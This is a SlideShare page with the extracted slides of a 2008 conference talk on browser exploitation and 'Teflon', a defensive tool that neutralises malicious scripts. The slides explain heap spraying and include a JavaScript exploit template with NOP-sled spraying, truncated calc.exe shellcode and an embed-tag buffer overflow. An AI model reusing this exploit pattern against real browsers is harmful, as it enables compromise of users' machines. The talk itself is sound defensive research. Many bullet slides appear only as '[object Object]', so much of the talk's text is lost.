SlideShare una empresa de Scribd logo

Teflon - Anti Stick for the browser attack surface

Saumil Shah
Saumil Shah

My presentation on browser exploitation and defense, at BA-Con 08, Buenos Aires.

1 de 48
Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface BA-Con 2008 – Buenos Aires
[object Object],[object Object],[object Object],[object Object],[object Object],# who am i # who am i 16:08 up 4:26, 1 user, load averages: 0.28 0.40 0.33 USER TTY FROM LOGIN@ IDLE WHAT saumil console - 11:43 0:05 bash
Web 2.0's attack surface ,[object Object],[object Object],[object Object],[object Object],[object Object]
Today's average browser
Browser Architecture DOM HTML+CSS Javascript
Browser Architecture DOM HTML+CSS Javascript user loaded content <img> <iframe> <script> <object> <div> <style> <embed> <span> <table> <form> <input> ... etc.
Browser Architecture DOM HTML+CSS Javascript user loaded content <img> <iframe> <script> <object> <div> <style> <embed> <span> <table> <form> <input> ... etc. Ajax libs Ajax/rich apps
The Browser is Desktop 2.0 &quot;Same Same But Different&quot;
The Browser – Kernel analogy DOM HTML+CSS Javascript user loaded content Ajax libs Ajax/rich apps Kernel System Call libs Userland programs LibC C Runtime Browser OS =
The Browser – Kernel analogy HTML+CSS Javascript user loaded content Ajax libs Ajax/rich apps System Call libs Userland programs LibC C Runtime Browser Core Kernel DOM Kernel =
The Browser – Kernel analogy DOM HTML+CSS Javascript user loaded content Ajax libs Ajax/rich apps Kernel System Call libs Userland programs LibC C Runtime Plugin / Extensions Drivers =
The Browser – Kernel analogy DOM HTML+CSS Javascript Ajax libs Ajax/rich apps Kernel System Call libs LibC C Runtime HTML / DHTML / JS Userland code <H1>hello world</H1> <script>alert('hi');</script> printf(&quot;Hello World&quot;); =
The Browser – Kernel analogy DOM Ajax libs Ajax/rich apps Kernel LibC C Runtime <object>, <embed> syscalls <object clsid=&quot;XX-YYY-ZZ&quot;> <embed src=&quot;file.mp4&quot;> System Call libs exec(&quot;program.bin&quot;); open(&quot;file.mp4&quot;); =
The Browser – Kernel analogy DOM Ajax libs Ajax/rich apps Kernel LibC C Runtime XHR Sockets xhr = new XMLHttpRequest() System Call libs s = socket(); =
Browser &quot;syscalls&quot; HTML Loaded DOM Javascript HTML
Browser &quot;syscalls&quot; HTML document.write(&quot;<object CLSID=XXX-XXXX-XXX>&quot;); DOM Javascript
Browser &quot;syscalls&quot; document.write(&quot;<object CLSID=XXX-XXXX-XXX>&quot;); Javascript HTML DOM
Exploiting a browser ,[object Object],[object Object],[object Object],[object Object],[object Object]
Exploiting a browser ,[object Object],[object Object],[object Object],[object Object],[object Object]
Heap Spraying NOP sled shellcode NOP sled shellcode NOP sled shellcode <script> : spray = build_large_nopsled(); a = new Array(); for(i = 0; i < 100; i++) a[i] = spray + shellcode; : </script> <html> : exploit trigger condition goes here : </html> a[7] a[8] a[9]
How it all works stack heap code and stuff 0xFFFFFFFF 0x00000000 ret EIP ret EIP frames on the stack var1 var3 var2 var4 overflow in var 3
The Heap...sprayed stack code and stuff 0xFFFFFFFF 0x00000000 ret EIP ret EIP var1 var3 var2 var4 overflow in var 3 <script> : for(i = 0; i < 50; i++) a[i] = nops + shellcode; : </script> part of the heap gets &quot;sprayed&quot;
Return to Heap stack code and stuff 0xFFFFFFFF 0x00000000 ret EIP ret EIP var1 var3 var2 var4 overwrite saved EIP AAAAAAAAAAAAAAAAAAAAAAAAAA heapaddr <object clsid=XXXXXXXX> exploit trigger in HTML code
Return to Heap stack code and stuff 0xFFFFFFFF 0x00000000 ret EIP ret EIP var1 var3 var2 var4 AAAAAAAAAAAAAAAAAAAAAAAAAA heapaddr Hit one of the many sprayed blocks.
Demo ,[object Object],[object Object],[object Object]
Exploits delivered by Javascript ,[object Object],[object Object],[object Object],[object Object],[object Object]
Browser defense ,[object Object],[object Object],[object Object],[object Object]
Effectiveness of Anti-Virus software ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
New directions of R&D ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
New directions of R&D ,[object Object],[object Object]
Teflon ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Teflon - objectives ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Teflon 0.2 ,[object Object],[object Object],[object Object],[object Object],[object Object]
Teflon 0.2 – lab tests ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Plain vanilla exploit <script> // calc.exe var shellcode = unescape(&quot;%ue8fc%u0044%u0000%u458b....... ......%u6c61%u2e63%u7865%u2065%u0000&quot;); // heap spray var spray = unescape(&quot;%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090&quot;); do { spray += spray; } while(spray.length < 0xc0000); memory = new Array(); for(i = 0; i < 50; i++) memory[i] = spray + shellcode; // we need approx 2200 A's to blow the buffer buf = &quot;&quot;; for(i = 0; i < 550; i++) buf += unescape(&quot;%05%05%05%05&quot;); buf += &quot;.wmv&quot;; document.write('<embed src=&quot;' + buf + '&quot;></embed>'); </script>
/packer/
Scriptasylum encoder/decoder
Demo ,[object Object],[object Object],[object Object],[object Object]
Teflon 0.2 – in the wild ,[object Object],[object Object],[object Object]
Without Teflon – 0wned
Without Teflon – 0wned
With Teflon – harmless div
With Teflon – harmless div
Teflon – practical deployment ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Teflon 0.2 - Limitations ,[object Object],[object Object],[object Object]
Where are browsers headed? ,[object Object],[object Object],[object Object],[object Object],javascript is everything WebSlices - WTF finally getting a decent UI totally on ACID fugly little snitch
Future R&D directions ,[object Object],[object Object],[object Object],[object Object],[object Object]
[email_address] Thank you BA-Con 2008 – Buenos Aires

Recomendados

Exploit Delivery
Exploit DeliveryExploit Delivery
Exploit DeliverySaumil Shah
 
Cloud forensics putting the bits back together
Cloud forensics putting the bits back togetherCloud forensics putting the bits back together
Cloud forensics putting the bits back togetherShakacon
 
Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Saumil Shah
 
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON
 
Racing with Droids
Racing with DroidsRacing with Droids
Racing with DroidsPeter Hlavaty
 
Power of linked list
Power of linked listPower of linked list
Power of linked listPeter Hlavaty
 
44CON London 2015 - Hunting Asynchronous Vulnerabilities
44CON London 2015 - Hunting Asynchronous Vulnerabilities44CON London 2015 - Hunting Asynchronous Vulnerabilities
44CON London 2015 - Hunting Asynchronous Vulnerabilities44CON
 
When is something overflowing
When is something overflowingWhen is something overflowing
When is something overflowingPeter Hlavaty
 

Recomendados

Exploit Delivery
Exploit DeliveryExploit Delivery
Exploit DeliverySaumil Shah
 
Cloud forensics putting the bits back together
Cloud forensics putting the bits back togetherCloud forensics putting the bits back together
Cloud forensics putting the bits back togetherShakacon
 
Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Saumil Shah
 
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON
 
Racing with Droids
Racing with DroidsRacing with Droids
Racing with DroidsPeter Hlavaty
 
Power of linked list
Power of linked listPower of linked list
Power of linked listPeter Hlavaty
 
44CON London 2015 - Hunting Asynchronous Vulnerabilities
44CON London 2015 - Hunting Asynchronous Vulnerabilities44CON London 2015 - Hunting Asynchronous Vulnerabilities
44CON London 2015 - Hunting Asynchronous Vulnerabilities44CON
 
When is something overflowing
When is something overflowingWhen is something overflowing
When is something overflowingPeter Hlavaty
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" Peter Hlavaty
 
Perl6 meets JVM
Perl6 meets JVMPerl6 meets JVM
Perl6 meets JVMTokuhiro Matsuno
 
Экспресс-анализ вредоносов / Crowdsourced Malware Triage
Экспресс-анализ вредоносов / Crowdsourced Malware TriageЭкспресс-анализ вредоносов / Crowdsourced Malware Triage
Экспресс-анализ вредоносов / Crowdsourced Malware TriagePositive Hack Days
 
Статический анализ кода в контексте SSDL
Статический анализ кода в контексте SSDLСтатический анализ кода в контексте SSDL
Статический анализ кода в контексте SSDLPositive Hack Days
 
Jean-Baptiste Favre - How to Monitor Bilions of Miles Shared by 20 Million Us...
Jean-Baptiste Favre - How to Monitor Bilions of Miles Shared by 20 Million Us...Jean-Baptiste Favre - How to Monitor Bilions of Miles Shared by 20 Million Us...
Jean-Baptiste Favre - How to Monitor Bilions of Miles Shared by 20 Million Us...Zabbix
 
Hacking - high school intro
Hacking - high school introHacking - high school intro
Hacking - high school introPeter Hlavaty
 
Web (dis)assembly
Web (dis)assemblyWeb (dis)assembly
Web (dis)assemblyShakacon
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?Peter Hlavaty
 
Integrating web archiving in preservation workflows. Louise Fauduet, Clément ...
Integrating web archiving in preservation workflows. Louise Fauduet, Clément ...Integrating web archiving in preservation workflows. Louise Fauduet, Clément ...
Integrating web archiving in preservation workflows. Louise Fauduet, Clément ...Biblioteca Nacional de España
 
Advanced windows debugging
Advanced windows debuggingAdvanced windows debugging
Advanced windows debuggingchrisortman
 
I can be apple and so can you
I can be apple and so can youI can be apple and so can you
I can be apple and so can youShakacon
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectPeter Hlavaty
 
44CON London 2015 - Is there an EFI monster inside your apple?
44CON London 2015 - Is there an EFI monster inside your apple?44CON London 2015 - Is there an EFI monster inside your apple?
44CON London 2015 - Is there an EFI monster inside your apple?44CON
 
Volker Fröhlich - How to Debug Common Agent Issues
Volker Fröhlich - How to Debug Common Agent IssuesVolker Fröhlich - How to Debug Common Agent Issues
Volker Fröhlich - How to Debug Common Agent IssuesZabbix
 
Software Security : From school to reality and back!
Software Security : From school to reality and back!Software Security : From school to reality and back!
Software Security : From school to reality and back!Peter Hlavaty
 
Debugging NET Applications With WinDBG
Debugging NET Applications With WinDBGDebugging NET Applications With WinDBG
Debugging NET Applications With WinDBGCory Foy
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
Perl6 web-app
Perl6 web-appPerl6 web-app
Perl6 web-appTokuhiro Matsuno
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...Codemotion
 
The history of teflon
The history of teflonThe history of teflon
The history of teflonInterlock Roofing Ltd.
 
Teflon Applications
Teflon ApplicationsTeflon Applications
Teflon ApplicationsOneSource Plastics & Metal Solutions
 

Más contenido relacionado

La actualidad más candente

You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" Peter Hlavaty
 
Экспресс-анализ вредоносов / Crowdsourced Malware Triage
Экспресс-анализ вредоносов / Crowdsourced Malware TriageЭкспресс-анализ вредоносов / Crowdsourced Malware Triage
Экспресс-анализ вредоносов / Crowdsourced Malware TriagePositive Hack Days
 
Статический анализ кода в контексте SSDL
Статический анализ кода в контексте SSDLСтатический анализ кода в контексте SSDL
Статический анализ кода в контексте SSDLPositive Hack Days
 
Jean-Baptiste Favre - How to Monitor Bilions of Miles Shared by 20 Million Us...
Jean-Baptiste Favre - How to Monitor Bilions of Miles Shared by 20 Million Us...Jean-Baptiste Favre - How to Monitor Bilions of Miles Shared by 20 Million Us...
Jean-Baptiste Favre - How to Monitor Bilions of Miles Shared by 20 Million Us...Zabbix
 
Hacking - high school intro
Hacking - high school introHacking - high school intro
Hacking - high school introPeter Hlavaty
 
Web (dis)assembly
Web (dis)assemblyWeb (dis)assembly
Web (dis)assemblyShakacon
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?Peter Hlavaty
 
Integrating web archiving in preservation workflows. Louise Fauduet, Clément ...
Integrating web archiving in preservation workflows. Louise Fauduet, Clément ...Integrating web archiving in preservation workflows. Louise Fauduet, Clément ...
Integrating web archiving in preservation workflows. Louise Fauduet, Clément ...Biblioteca Nacional de España
 
Advanced windows debugging
Advanced windows debuggingAdvanced windows debugging
Advanced windows debuggingchrisortman
 
I can be apple and so can you
I can be apple and so can youI can be apple and so can you
I can be apple and so can youShakacon
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectPeter Hlavaty
 
44CON London 2015 - Is there an EFI monster inside your apple?
44CON London 2015 - Is there an EFI monster inside your apple?44CON London 2015 - Is there an EFI monster inside your apple?
44CON London 2015 - Is there an EFI monster inside your apple?44CON
 
Volker Fröhlich - How to Debug Common Agent Issues
Volker Fröhlich - How to Debug Common Agent IssuesVolker Fröhlich - How to Debug Common Agent Issues
Volker Fröhlich - How to Debug Common Agent IssuesZabbix
 
Software Security : From school to reality and back!
Software Security : From school to reality and back!Software Security : From school to reality and back!
Software Security : From school to reality and back!Peter Hlavaty
 
Debugging NET Applications With WinDBG
Debugging NET Applications With WinDBGDebugging NET Applications With WinDBG
Debugging NET Applications With WinDBGCory Foy
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...Codemotion
 

La actualidad más candente (20)

You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
 
Perl6 meets JVM
Perl6 meets JVMPerl6 meets JVM
Perl6 meets JVM
 
Экспресс-анализ вредоносов / Crowdsourced Malware Triage
Экспресс-анализ вредоносов / Crowdsourced Malware TriageЭкспресс-анализ вредоносов / Crowdsourced Malware Triage
Экспресс-анализ вредоносов / Crowdsourced Malware Triage
 
Статический анализ кода в контексте SSDL
Статический анализ кода в контексте SSDLСтатический анализ кода в контексте SSDL
Статический анализ кода в контексте SSDL
 
Jean-Baptiste Favre - How to Monitor Bilions of Miles Shared by 20 Million Us...
Jean-Baptiste Favre - How to Monitor Bilions of Miles Shared by 20 Million Us...Jean-Baptiste Favre - How to Monitor Bilions of Miles Shared by 20 Million Us...
Jean-Baptiste Favre - How to Monitor Bilions of Miles Shared by 20 Million Us...
 
Hacking - high school intro
Hacking - high school introHacking - high school intro
Hacking - high school intro
 
Web (dis)assembly
Web (dis)assemblyWeb (dis)assembly
Web (dis)assembly
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?
 
Integrating web archiving in preservation workflows. Louise Fauduet, Clément ...
Integrating web archiving in preservation workflows. Louise Fauduet, Clément ...Integrating web archiving in preservation workflows. Louise Fauduet, Clément ...
Integrating web archiving in preservation workflows. Louise Fauduet, Clément ...
 
Advanced windows debugging
Advanced windows debuggingAdvanced windows debugging
Advanced windows debugging
 
I can be apple and so can you
I can be apple and so can youI can be apple and so can you
I can be apple and so can you
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could Expect
 
44CON London 2015 - Is there an EFI monster inside your apple?
44CON London 2015 - Is there an EFI monster inside your apple?44CON London 2015 - Is there an EFI monster inside your apple?
44CON London 2015 - Is there an EFI monster inside your apple?
 
Volker Fröhlich - How to Debug Common Agent Issues
Volker Fröhlich - How to Debug Common Agent IssuesVolker Fröhlich - How to Debug Common Agent Issues
Volker Fröhlich - How to Debug Common Agent Issues
 
Software Security : From school to reality and back!
Software Security : From school to reality and back!Software Security : From school to reality and back!
Software Security : From school to reality and back!
 
Debugging NET Applications With WinDBG
Debugging NET Applications With WinDBGDebugging NET Applications With WinDBG
Debugging NET Applications With WinDBG
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
 
Perl6 web-app
Perl6 web-appPerl6 web-app
Perl6 web-app
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
 
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...
 

Destacado

How the Collapse of Marriage Hurts Children and Three Steps to Reverse the Da...
How the Collapse of Marriage Hurts Children and Three Steps to Reverse the Da...How the Collapse of Marriage Hurts Children and Three Steps to Reverse the Da...
How the Collapse of Marriage Hurts Children and Three Steps to Reverse the Da...Thomas Mastromatto NMLS #145824
 
Why David Fall into Temptation
Why David Fall into TemptationWhy David Fall into Temptation
Why David Fall into TemptationJesus Redeemer
 
Cld learning partner case studies dec 2014
Cld learning partner case studies dec 2014Cld learning partner case studies dec 2014
Cld learning partner case studies dec 2014Inspiringmegan
 
Event Express 360⁰
Event Express 360⁰Event Express 360⁰
Event Express 360⁰Nija Taylor
 
Any screen available
Any screen availableAny screen available
Any screen availableMediamond
 
Cover super looking for you !
Cover super looking for you !Cover super looking for you !
Cover super looking for you !Anne Sukma
 
Csőgörény
CsőgörényCsőgörény
Csőgörénygnadori
 
Alimentos durante el primer año
Alimentos durante el primer añoAlimentos durante el primer año
Alimentos durante el primer añoDianaBlasto
 
Présentation du Chantier de la LigneB du Métro de Rennes - EGIS
Présentation du Chantier de la LigneB du Métro de Rennes - EGISPrésentation du Chantier de la LigneB du Métro de Rennes - EGIS
Présentation du Chantier de la LigneB du Métro de Rennes - EGISNovabuild
 
Como recuperar la belleza de tu cabello 2
Como recuperar la belleza de tu cabello 2Como recuperar la belleza de tu cabello 2
Como recuperar la belleza de tu cabello 2Viodem Productos
 
Design and Rating of Packed Distillation Columns
Design and Rating of Packed Distillation ColumnsDesign and Rating of Packed Distillation Columns
Design and Rating of Packed Distillation ColumnsGerard B. Hawkins
 

Destacado (20)

The history of teflon
The history of teflonThe history of teflon
The history of teflon
 
Teflon Applications
Teflon ApplicationsTeflon Applications
Teflon Applications
 
LinkedIn Profile.doc-SABARI
LinkedIn Profile.doc-SABARILinkedIn Profile.doc-SABARI
LinkedIn Profile.doc-SABARI
 
How the Collapse of Marriage Hurts Children and Three Steps to Reverse the Da...
How the Collapse of Marriage Hurts Children and Three Steps to Reverse the Da...How the Collapse of Marriage Hurts Children and Three Steps to Reverse the Da...
How the Collapse of Marriage Hurts Children and Three Steps to Reverse the Da...
 
Why David Fall into Temptation
Why David Fall into TemptationWhy David Fall into Temptation
Why David Fall into Temptation
 
Cld learning partner case studies dec 2014
Cld learning partner case studies dec 2014Cld learning partner case studies dec 2014
Cld learning partner case studies dec 2014
 
Tolweg
TolwegTolweg
Tolweg
 
4. stack
4. stack4. stack
4. stack
 
FINAL TO USE INFO GPH WE BUY
FINAL TO USE INFO GPH WE BUY FINAL TO USE INFO GPH WE BUY
FINAL TO USE INFO GPH WE BUY
 
Event Express 360⁰
Event Express 360⁰Event Express 360⁰
Event Express 360⁰
 
Any screen available
Any screen availableAny screen available
Any screen available
 
Cover super looking for you !
Cover super looking for you !Cover super looking for you !
Cover super looking for you !
 
Teflon
TeflonTeflon
Teflon
 
Csőgörény
CsőgörényCsőgörény
Csőgörény
 
Alimentos durante el primer año
Alimentos durante el primer añoAlimentos durante el primer año
Alimentos durante el primer año
 
5. queue
5. queue5. queue
5. queue
 
Présentation du Chantier de la LigneB du Métro de Rennes - EGIS
Présentation du Chantier de la LigneB du Métro de Rennes - EGISPrésentation du Chantier de la LigneB du Métro de Rennes - EGIS
Présentation du Chantier de la LigneB du Métro de Rennes - EGIS
 
Como recuperar la belleza de tu cabello 2
Como recuperar la belleza de tu cabello 2Como recuperar la belleza de tu cabello 2
Como recuperar la belleza de tu cabello 2
 
Prompt questions
Prompt questionsPrompt questions
Prompt questions
 
Design and Rating of Packed Distillation Columns
Design and Rating of Packed Distillation ColumnsDesign and Rating of Packed Distillation Columns
Design and Rating of Packed Distillation Columns
 

Similar a Teflon - Anti Stick for the browser attack surface

Ajax to the Moon
Ajax to the MoonAjax to the Moon
Ajax to the Moondavejohnson
 
Even Faster Web Sites at jQuery Conference '09
Even Faster Web Sites at jQuery Conference '09Even Faster Web Sites at jQuery Conference '09
Even Faster Web Sites at jQuery Conference '09Steve Souders
 
Enterprise AIR Development for JavaScript Developers
Enterprise AIR Development for JavaScript DevelopersEnterprise AIR Development for JavaScript Developers
Enterprise AIR Development for JavaScript DevelopersAndreCharland
 
Google在Web前端方面的经验
Google在Web前端方面的经验Google在Web前端方面的经验
Google在Web前端方面的经验yiditushe
 
SXSW: Even Faster Web Sites
SXSW: Even Faster Web SitesSXSW: Even Faster Web Sites
SXSW: Even Faster Web SitesSteve Souders
 
Front End Website Optimization
Front End Website OptimizationFront End Website Optimization
Front End Website OptimizationGerard Sychay
 
Clustering Made Easier: Using Terracotta with Hibernate and/or EHCache
Clustering Made Easier: Using Terracotta with Hibernate and/or EHCacheClustering Made Easier: Using Terracotta with Hibernate and/or EHCache
Clustering Made Easier: Using Terracotta with Hibernate and/or EHCacheCris Holdorph
 
Widget Summit 2008
Widget Summit 2008Widget Summit 2008
Widget Summit 2008Volkan Unsal
 
Silver Light By Nyros Developer
Silver Light By Nyros DeveloperSilver Light By Nyros Developer
Silver Light By Nyros DeveloperNyros Technologies
 
Flash Security, OWASP Chennai
Flash Security, OWASP ChennaiFlash Security, OWASP Chennai
Flash Security, OWASP Chennailavakumark
 
Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Apps
Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash AppsOwasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Apps
Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Appsguestb0af15
 
An Introduction to Solr
An Introduction to SolrAn Introduction to Solr
An Introduction to Solrtomhill
 
WebTest - Efficient Functional Web Testing with HtmlUnit and Beyond
WebTest - Efficient Functional Web Testing with HtmlUnit and BeyondWebTest - Efficient Functional Web Testing with HtmlUnit and Beyond
WebTest - Efficient Functional Web Testing with HtmlUnit and Beyondmguillem
 

Similar a Teflon - Anti Stick for the browser attack surface (20)

&lt;img src="xss.com">
&lt;img src="xss.com">&lt;img src="xss.com">
&lt;img src="xss.com">
 
Fav
FavFav
Fav
 
Ajax to the Moon
Ajax to the MoonAjax to the Moon
Ajax to the Moon
 
Even Faster Web Sites at jQuery Conference '09
Even Faster Web Sites at jQuery Conference '09Even Faster Web Sites at jQuery Conference '09
Even Faster Web Sites at jQuery Conference '09
 
Enterprise AIR Development for JavaScript Developers
Enterprise AIR Development for JavaScript DevelopersEnterprise AIR Development for JavaScript Developers
Enterprise AIR Development for JavaScript Developers
 
Shifting Gears
Shifting GearsShifting Gears
Shifting Gears
 
Google在Web前端方面的经验
Google在Web前端方面的经验Google在Web前端方面的经验
Google在Web前端方面的经验
 
Sxsw 20090314
Sxsw 20090314Sxsw 20090314
Sxsw 20090314
 
SXSW: Even Faster Web Sites
SXSW: Even Faster Web SitesSXSW: Even Faster Web Sites
SXSW: Even Faster Web Sites
 
Front End Website Optimization
Front End Website OptimizationFront End Website Optimization
Front End Website Optimization
 
Grails and Dojo
Grails and DojoGrails and Dojo
Grails and Dojo
 
Clustering Made Easier: Using Terracotta with Hibernate and/or EHCache
Clustering Made Easier: Using Terracotta with Hibernate and/or EHCacheClustering Made Easier: Using Terracotta with Hibernate and/or EHCache
Clustering Made Easier: Using Terracotta with Hibernate and/or EHCache
 
Widget Summit 2008
Widget Summit 2008Widget Summit 2008
Widget Summit 2008
 
Silver Light By Nyros Developer
Silver Light By Nyros DeveloperSilver Light By Nyros Developer
Silver Light By Nyros Developer
 
Flash Security, OWASP Chennai
Flash Security, OWASP ChennaiFlash Security, OWASP Chennai
Flash Security, OWASP Chennai
 
Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Apps
Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash AppsOwasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Apps
Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Apps
 
An Introduction to Solr
An Introduction to SolrAn Introduction to Solr
An Introduction to Solr
 
Introduce Django
Introduce DjangoIntroduce Django
Introduce Django
 
WebTest - Efficient Functional Web Testing with HtmlUnit and Beyond
WebTest - Efficient Functional Web Testing with HtmlUnit and BeyondWebTest - Efficient Functional Web Testing with HtmlUnit and Beyond
WebTest - Efficient Functional Web Testing with HtmlUnit and Beyond
 
Web::Scraper
Web::ScraperWeb::Scraper
Web::Scraper
 

Más de Saumil Shah

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksSaumil Shah
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSSaumil Shah
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkSaumil Shah
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Saumil Shah
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise PresentationsSaumil Shah
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceSaumil Shah
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020Saumil Shah
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadSaumil Shah
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceSaumil Shah
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadSaumil Shah
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadSaumil Shah
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019Saumil Shah
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-XSaumil Shah
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDSaumil Shah
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019Saumil Shah
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019Saumil Shah
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM AssemblySaumil Shah
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
